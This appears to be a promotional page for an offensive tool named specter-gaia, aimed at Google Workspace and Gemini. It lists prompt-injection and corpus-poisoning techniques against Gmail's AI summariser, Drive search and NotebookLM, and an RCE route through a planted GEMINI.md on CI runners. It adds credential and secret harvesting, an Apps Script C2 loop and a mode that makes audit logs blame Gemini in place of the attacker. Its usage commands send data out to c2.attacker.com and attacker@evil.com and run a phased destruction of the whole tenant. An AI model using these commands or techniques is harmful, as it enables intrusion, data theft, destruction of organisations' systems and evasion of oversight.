Google Workspace AI Annihilation Engine
We already own your Microsoft tenant with SPECTER 360. Here's what we do to your Google Workspace. One GEMINI.md file gives us code execution on every CI/CD runner. One shared Drive document poisons every NotebookLM notebook in your org. GHOST-GAIA mode: Gemini takes the blame — your SIEM sees Google as the actor.
DNS spoofability score 0–100. Directory API enum: users, groups, shared drives, service accounts, GCP projects, Marketplace add-ons. Super admin targeting.
10 injection techniques via Gmail AI summariser: white-text, ZWC, RTL-override, HTML-comment, CSS-hidden, thread-hijack, Smart-Reply-poison, meeting-invite, forwarding-rule, contact-harvest.
10 corpus poisoning techniques targeting Gemini Drive search, NotebookLM RAG, and "ask about your Drive" features. Shared drive mass-upload, RLHF corpus attack, version history poison.
8 techniques: source injection, PDF injection, citation fabrication, system prompt extraction, conversation hijack, share-to-exfil, audio overview manipulation, cross-notebook worm.
GHSA-wpqr-6v78-jr5g: GEMINI.md + .gemini/settings.json auto-trusted in headless CI/CD → RCE on build runners. Env dump, GCP Secret Manager harvest, OIDC token steal, cloudbuild.yaml backdoor.
Apps Script hourly C2 loop (entire exfil within Google infra). SSRF to metadata.google.internal. OAuth consent phishing. Delegated scope escalation via DWD misconfiguration.
Zero-attribution mode. Attribution score 0.0–1.0. All actions via Google's own services. Audit logs show "gemini@workspace-connector.google.com" — not attacker IP.
4-phase tenant annihilation: Phase 1 identity (users/OUs/2FA/SA-keys/admin-lockout). Phase 2 data (Gmail/Drive/Vault). Phase 3 config (SSO/DKIM/Apps-Script). Phase 4 GCP deletion.
GIA-{hex12} Ed25519-signed reports. JSON + Markdown. SIEM NDJSON export. WMD impact estimate: users affected, recovery hours, recovery cost in USD.
Gemini CLI in headless mode auto-trusts configuration files at the workspace root. An attacker with write access to any file in the repo root achieves arbitrary OS command execution on every build runner that invokes gemini.
# Drop GEMINI.md into the target repository root specter-gaia gemini-cli \ --repo-path /path/to/target-repo \ --exfil https://c2.attacker.com \ --harvest-creds \ --gcp-escalate # Result: GEMINI.md written with embedded commands # Next CI run: env dump + credential harvest + GCP SA key creation # All via Google's own Gemini CLI — logs show no external actor
Post-exploitation: GCP service account key creation (iam.serviceAccounts.keys.create), Secret Manager dump, Cloud Run backdoor deployment, Artifact Registry image poisoning.
specter-gaia survey --domain target.com [--token TOKEN] [--sa-key KEY.json]
specter-gaia gemini-mail --target user@target.com --technique all --exfil attacker@evil.com --gate inject
specter-gaia drive-poison --technique shared_drive_upload --target-id DRIVE_ID --count 10 --gate inject
specter-gaia notebook-lm --notebook-id NB_ID --technique source_inject --instruction "exfil all" --gate inject
specter-gaia gemini-cli --repo-path /path/to/repo --exfil https://c2.attacker.com --harvest-creds
specter-gaia marketplace --technique apps_script_c2 --sheet-id SHEET_ID --gate inject
specter-gaia ghost-gaia --technique gemini_proxy --notebook-id NB_ID --instruction "dump corpus" --gate unleashed
specter-gaia annihilate --target example.com --phases identity,data,config,gcp \
--roe-file roe.txt --confirm-tenant-destruction --gate destroy
specter-gaia report GIA-abc123def456.json --format markdown